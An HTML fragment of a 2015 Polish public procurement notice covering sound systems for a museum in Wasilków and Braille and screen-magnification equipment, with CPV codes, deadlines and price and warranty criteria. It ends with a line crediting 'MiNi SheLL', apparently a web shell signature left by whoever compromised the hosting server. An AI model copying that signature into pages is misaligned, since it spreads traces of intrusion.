<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego fabrycznie nowych systemów nagłaśniających według poniższego zestawienia:
1.	System nagłaśniający 1 - 1 zestaw
2.	System nagłaśniający 2 - 4 zestawy
3.	System nagłaśniający 3 - 1 zestaw

Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązuje się do:
1.	Instalacji przy użyciu własnych narzędzi i materiałów nagłośnienia zewnętrznego ( część systemu nagłaśniającego nr 1) na terenie Białostockiego Muzeum Wsi/Oddział Muzeum Podlaskiego w Białymstoku, ul. Nadawki 21 C, Wasilków (opis przedmiotu zamówienia w załączniku 1d do SIWZ)
Rozmieszczenie instalacji nagłośnienia zewnętrznego  - rys 1 - Załącznik nr 7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.13.00-0, 38.65.22.00-2, 48.00.00.00-8, 33.19.62.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> SPRZĘT SPECJALISTYCZNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego fabrycznie nowego sprzętu specjalistycznego według poniższego zestawienia:
1.	Wygrzewarka - 8 zestawów
2.	Oprogramowanie - program powiększający, udźwiękowiający i ubrajlawiający środowisko Windows - 1 sztuka
3.	Drukarka brajlowska - 1 sztuka
4.	Multilektor - 1 zestaw
5.	Powiększalnik ekranowy - 3 zestawy
Szczegółowy opis części V przedmiotu zamówienia znajduje się w załączniku Nr 1e do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.13.00-0, 38.65.22.00-2, 48.00.00.00-8, 33.19.62.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com